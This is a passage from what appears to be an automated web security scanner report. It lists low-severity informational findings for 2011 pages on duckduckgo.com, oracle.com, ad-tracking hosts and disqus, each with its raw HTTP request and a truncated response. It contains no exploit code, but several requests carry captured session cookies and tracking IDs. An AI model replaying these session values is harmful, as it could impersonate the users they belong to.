Cookie: arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103eae209d9a08b4a373a6ad539ce16e4df1429504f76b570cf2aabd32c14984f3f7e12072f8ade69a7b5ff2200689db1b7; __qca=P0-1165085945-1298945312517; lcid=6f2ca7b2012e10009755722813cc6926; __unam=c3eadea-12e6f5153b2-24b418a5-1; __utmz=261428178.1298947724.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.452644752.1298947724.1298947724.1298947724.1; __utmc=261428178; __utmb=261428178.2.10.1298947724; __utmz=170572213.1298947744.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=170572213.10405763.1298947744.1298947744.1298947744.1; __utmc=170572213; __utmb=170572213.2.10.1298947744; _chartbeat2=wntukiwjtf1jnkcs

Response

HTTP/1.1 404 Not Found
P3P: policyref="/w3c/p3p.xml",CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Content-Length: 9
ETag: "135d4069"
Content-type: text/html
Date: Tue, 01 Mar 2011 02:48:50 GMT
Server: Mashery Proxy

Not found

15.18. http://donttrack.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://donttrack.us
Path:   /

Request

GET / HTTP/1.1
Host: donttrack.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:54:53 GMT
Content-Type: text/html
Last-Modified: Thu, 03 Feb 2011 11:55:42 GMT
Connection: keep-alive
Expires: Tue, 01 Mar 2011 02:54:53 GMT
Cache-Control: max-age=3600
Content-Length: 15594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google tracks you. We don't. An illustrated guide.</title>
<link rel="image_src"
...[SNIP]...

15.19. http://duckduckgo.com/asciitable.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /asciitable.html

Request

GET /asciitable.html HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=ascii+table
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 03:18:08 GMT
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 02:38:43 GMT
Connection: keep-alive
Expires: Wed, 02 Mar 2011 03:18:08 GMT
Cache-Control: max-age=86400
Content-Length: 16941

<!DOCTYPE><html><head><title>ASCII Table</title><style>#ascii-table {
font-family: Courier, monospace;
font-size: 12px;
width: 410px;
min-width: 500px;
text-align: right;
line-
...[SNIP]...

15.20. http://duckduckgo.com/leaderboard.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /leaderboard.html

Request

GET /leaderboard.html?r=0.14583805645816028 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/spread.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:54:22 GMT
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 05:01:24 GMT
Connection: keep-alive
Expires: Wed, 02 Mar 2011 01:54:22 GMT
Cache-Control: max-age=86400
Content-Length: 8195

<html><head><link rel="stylesheet" href="/s99.css" type="text/css"><style type="text/css">html {overflow:hidden;background-color:#FAFAFA;font-size:15px!important;}</style></head><body><span class="clu
...[SNIP]...

15.21. http://duckduckgo.com/post.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /post.html

Request

GET /post.html HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=xss
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 23:41:16 GMT
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 02:38:43 GMT
Connection: keep-alive
Expires: Mon, 28 Feb 2011 23:41:16 GMT
Cache-Control: max-age=86400
Content-Length: 350

<html>
<body>
<script type="text/JavaScript">
function post(e) {
if(e.source==parent && e.origin == location.protocol+'//'+location.hostname)
parent.location.href=e.data;
}

if (window.addEventLis
...[SNIP]...

15.22. http://duckduckgo.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /privacy.html

Request

GET /privacy.html HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/search_box.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlMzczNjM5MmY5OTgxY2Y0MjBkNjIzZDg1ZDBiNzA0MmE%3D--3e8d70a971450d94414e9de9c563709ccf72716e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:11 GMT
Content-Type: text/html
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: keep-alive
Expires: Wed, 02 Mar 2011 02:01:11 GMT
Cache-Control: max-age=86400
Content-Length: 17291

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Duck Duck Go Privacy Policy</title>
<link rel="stylesheet" href="/s312.css" type=
...[SNIP]...

15.23. http://duckduckgo.com/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /search.html

Request

GET /search.html HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/search_box.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:54:16 GMT
Content-Type: text/html
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: keep-alive
Expires: Wed, 02 Mar 2011 01:54:16 GMT
Cache-Control: max-age=86400
Content-Length: 3008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Duck Duck Go</title>
<link rel="stylesheet" href="/s268.css" type="text/css">
<script ty
...[SNIP]...

15.24. http://duckduckgo.com/terms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /terms.html

Request

GET /terms.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:46:58 GMT
Content-Type: text/html
Content-Length: 31798
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:46:58 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Duck Duck Go Terms of Service</title>
<link rel="stylesheet" href="/s312.css" typ
...[SNIP]...

15.25. http://duckduckgo.com/traffic.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /traffic.html

Request

GET /traffic.html HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:54:13 GMT
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 05:01:25 GMT
Connection: keep-alive
Expires: Wed, 02 Mar 2011 01:54:13 GMT
Cache-Control: max-age=86400
Content-Length: 7673

<html><pre>Date    Queries
Sun 27-Feb-2011    175,579
Sat 26-Feb-2011    167,815
Fri 25-Feb-2011    191,122
Thu 24-Feb-2011    206,022
Wed 23-Feb-2011    200,359
Tue 22-Feb-2011    202,995
Mon 21-Feb-2011    201,364
Sun 20-F
...[SNIP]...

15.26. https://duckduckgo.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /privacy.html

Request

GET /privacy.html HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:55:18 GMT
Content-Type: text/html
Content-Length: 17291
Last-Modified: Sun, 27 Feb 2011 18:55:41 GMT
Connection: close
Expires: Wed, 02 Mar 2011 02:55:18 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Duck Duck Go Privacy Policy</title>
<link rel="stylesheet" href="/s312.css" type=
...[SNIP]...

15.27. http://eventreg.oracle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eventreg.oracle.com
Path:   /

Request

GET / HTTP/1.1
Host: eventreg.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=438058f0ed486085d4140952cd54e048a878cc48287bab5277a722608c6b2d81.e3yTa3qSb38Te3mRbN0Lc3aQbO0;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:15 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Last-Modified: Mon, 20 Sep 2010 22:49:11 GMT
ETag: "11f0dfd-149-4c97e4e7"
Accept-Ranges: bytes
Content-Length: 329
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Oracle Events</title
...[SNIP]...

15.28. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2507573;type=enter902;cat=gss-h177;ord=1713184297550.4697? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/sitesearch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 26 Feb 2011 23:25:18 GMT
Expires: Sat, 26 Feb 2011 23:25:18 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

15.29. http://ioerror.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ioerror.us
Path:   /

Request

GET / HTTP/1.1
Host: ioerror.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:08 GMT
Content-Type: text/html
Last-Modified: Sat, 26 Feb 2011 23:00:07 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Tue, 29 Mar 2011 23:19:08 GMT
Cache-Control: max-age=2678400
Content-Length: 40960

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Porcupine | Just another WordPress site</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="sty
...[SNIP]...

15.30. http://ioerror.us/bb2-support-key  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ioerror.us
Path:   /bb2-support-key

Request

GET /bb2-support-key?key=adc1-d6f3-b783-0251 HTTP/1.1
Host: ioerror.us
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 20:42:04 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Content-Length: 2119

<html>
<head>
<title>Technical Support</title>
<style type="text/css">
body { background: white; color: black; font-size: 12px; font-family: Tahoma,Verdana,Arial,sans-serif; text-align: center; }
#con
...[SNIP]...

15.31. http://js.bizographics.com/support/partner.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.bizographics.com
Path:   /support/partner.html

Request

GET /support/partner.html?pid=221&u=fa:it,ind:businessservices,slots:3 HTTP/1.1
Host: js.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=ts31Zu27MS1WkbisJVK3RrNQb1MaQBj6W1Pcisad54kZd2VrCIGNp5RdHGLm7YsbqNRZwyVXEG6DIpUIfyKILYmKHI1ABSLZvLgDunbE6nvquxBmb0D45iic3c1CtipWe7eL2Qw52djlUKyxBmb0D45iicyrAWx24Ux4V2FP8cTmwANONupnpcGwYfPATgLCJvnzT4RPryXA1ax80hRd8BQsdl5aKeenwN6x6W8H95eYqt4fDg3TBfWjrtiivVcIOElY32haGkFuCOCd8kisMlaH0zqGS8GvQ96Pv9Wdl4zfJRRGEHCIMkdZf9cipj8l3ZY0x538gj3RipxoWlipmMVXiiHcaWcBzdhe5QAWPecIIMQJzBGYJn7o4sHezgWIS55qqGW7JzVxay7vXnx5Tpuis8w77hW2bjFYA669pnlhSii48NipADZiidrfMyxSuQgpGqVCGBRa9x1AWwNKoOnEiiYateipx4n7q1tRBl8M2vnPDcsOceLYL7xCpS2siiu3pAiihCoPIGlN7GO8tJ8bQ1OCBD8HisSkIBagBh5xlR27HxK3m9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzAZFN87RBuXHRktmaxWiiZAisOEhN8UMj4XZdpd4cxDdHzQREHLsYQB6nhtLsAd8x87mzLpZBD9ip3GpzFRqiidRo2dXQ06xWWgwYvO8jmWc9UzGfccMWY4JCgI6UbOgtTlGWgrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmQlNdH9CCvy4aMOLfLVy0KRksJdJjg51dyLvwBYDXGbG2QtsSmtffipvq6lneLoYFVX1yYwMlSLgl5GUTmT1M4Ut5nPFweNVBfoW8LZCUt4bW0E5eyNYkZTpFClIzlY1MxzBqEyAgf2VzPjVjYUaBJtqo0WWs2TtsUcJRQW9nslcjn6x4lPJOxYOGUh7ZFIObNZ6NfU7cbg59GMg13N2GMr42emSOGaJpY; BizoNetworkPartnerIndex=8
If-None-Match: "ca9e9eba6225ec48bc146a9223ffcf9b"
If-Modified-Since: Tue, 29 Sep 2009 00:42:52 GMT

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:18:15 GMT
Server: PWS/1.7.1.5
X-Px: ht iad-agg-n18.panthercdn.com
ETag: "ca9e9eba6225ec48bc146a9223ffcf9b"
Cache-Control: max-age=3600
Expires: Sun, 27 Feb 2011 03:07:32 GMT
Age: 643
Content-Length: 857
Content-Type: text/html
Last-Modified: Tue, 29 Sep 2009 00:42:52 GMT
Connection: keep-alive

<html>
<head><title></title></head>
<body>
<script type="text/javascript">
var params = [];
if (window.location.href.indexOf("#") > -1) {
params = window.location.hash.substring(1).split("&");
...[SNIP]...

15.32. http://load.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/net.php

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMjc2IiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBib3JkZXI9IjAiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vaWIuYWRueHMuY29tL3NlZz9hZGQ9ODUwMzQmZXhwaXJlX2RheXM9MjAmb3RoZXI9MTc3MDAxIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD00ZGUzMGE1MDBjOGM2YjhiZjljYmE3NTk5NTA1YjUyOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=c4ae08201e9f109b02be68e4efd9ed36 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdissOwiAQAP9lv2ChrMByIoVDkx6MjYm3BqgkPWl9xIPx30Uvk8lkEnf8vjfAcQjgmkkGtZw7TIRYTNllk6stOWmylpAySfv%252FGMZDD25lQQJRadGiEAzPdZknicqH0%252B%252BTmqH3cYr7V%252FCPOcehXvw2VrNdjbwVcJ8v8vQj9g%253D%253D; myPAL=eJydkL0OwjAMhN8Frxls569JpwILEq0QVKgrY2dG4N2xUymUDbEkUXz32edbjvkxZ2zvmZq8IY8NpJQICB2gR9i0cyapBqtVQkgcmcm4lCySEa3XIwDFCIgE3XY0534y3Wkw3X4yF0Yn9xNJUSwoW1HVzNpNzFXMKrYqjj%252F2VYMTAy8GXsUICKM8evkpXK95QpFFYAFEQyk5smus8zXOYbiWSLtj%252Fx3JKi0IraFCa5Yp0fyzJOkiS%252Fo8ZdTXG3wDXME%253D; BFF=eJzNkz1uwzAMhe%252FiE4iUZEXykrQZaiB2g8YI2inI2Llj27tXTlSJ%252BquBIEPX9z2Stsh3NqjN54cBZprNw7TWqBCh6d4NSGCdBdw0w%252FM4Pe3eTsf%252B0E9NdzYC%252F6zhF502sc6X4bXotHrBCVpzhQUgLGCQgM1%252BLH%252FFfkyd2%252FJXWJ06pWkOyIRVvxistdZt0idQCtCDtEZ5UhuDc4msjcH6mLRmAiaGGfzWoAXS6USKvJwAfV0rglLKyeoq9%252BMxk%252FlFjn3zolIf2awAHvsfd0Opr5Vj3%252FzHWd%252BWPBMvjg2YAh5esVTkL5s5sEoPOQX%252BCjOwLVW45dvHczcmk7JAKUAP0hrlCfW3pBFGf5rNQQp4mBMXfVfyvOoq8aXbj%252BKbPVyW61JaF8JZz%252BBC3G5I1Z0idKfE3BiQ%252F52D%252BrkvXXb9gH8ABq2ndA%253D%253D; TFF=eJydlEESgyAMRe%252FSEyQBTMGNx%252BjWhYvOdNfuOt690baoBBx04QSd%252Fwgx%252BfTBQHg%252FA1K4INgOHHTee7q0faDwvgds5XFwlQD%252F5aj0OOlNoqf2%252B7rmOGJ1hESwWyXST0l67%252BE2PPrXkOyN%252F705VwVzB4C5qnGpGmHW25WemCitO2YyOyR6b5jOkFZIqM%252B5rc6d5JpajiNWR0hkPnAmmgan0CnY16vaQU1bllO1lziOWB0h39Rc751pNk2T9SYuPpCl1qsTkc5Da282qTeLxJzJumJXFr%252FJctKbRU%252FSfE4TsU7E0QQ%252FUOxj0ZwkM8Yrktvi1AhVcmqEShxHrI6QaN2Rv7C%252BuFSL9fUrn8bxA3afiMY%253D; EVX=eJzFkUEKwzAMBP%252FiF2hlOYrkx4gcfe6x5O%252BxQyGhKbSFQo%252FSrJYBLa5%252Bb26szKiL85io3hyzJxRQaEA1iBAlONXmOOh8olMg1bW5mGX6TZWZlV4kXxUNyiQPikH5oDpupZxpfisx%252FV2C%252B0K7BZ4sLk09CzNB%252FjC8P55ehK8W6wZesYtl

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Sun, 27 Feb 2011 02:18:27 GMT
Server: HTTP server
Content-Length: 397

<HTML><BODY><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=1276" width="0" height="0" border="0"></img><img src="http://ib.adnxs.com/seg?add=85034&expire_days=20&other=177001" width=
...[SNIP]...

15.33. http://mediacdn.disqus.com/1298421702/build/system/def.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1298421702/build/system/def.html

Request

GET /1298421702/build/system/def.html?xdm_e=http%3A%2F%2Ftechcrunch.com&xdm_c=default2100&xdm_p=1 HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-930191663-1298773827745

Response

HTTP/1.0 200 OK
Date: Sun, 27 Feb 2011 02:32:14 GMT
Expires: Tue, 29 Mar 2011 02:32:14 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 23 Feb 2011 03:05:03 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: HIT from chafe.disqus.net
X-Cache-Lookup: HIT from chafe.disqus.net:3128
X-Origin-Date: Wed, 23 Feb 2011 03:39:06 GMT
X-Origin-Expires: Fri, 25 Mar 2011 03:39:06 GMT
X-Cache-Age: 341588
X-Cache: HIT from cdce-nym011-014.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 chafe.disqus.net:3128 (squid), 1.0 cdce-nym011-014.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 1431

<!DOCTYPE html>

<html>
<head>

<script src="http://mediacdn.disqus.com/1298421702/js/dist/lib.js"></script>


<script>
var urls = {
sigma: "http://sigma.disqus.com/forums/sig
...[SNIP]...

15.34. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/logo-oracle-red.png

Request

GET /EndUser/images/logo-oracle-red.png HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
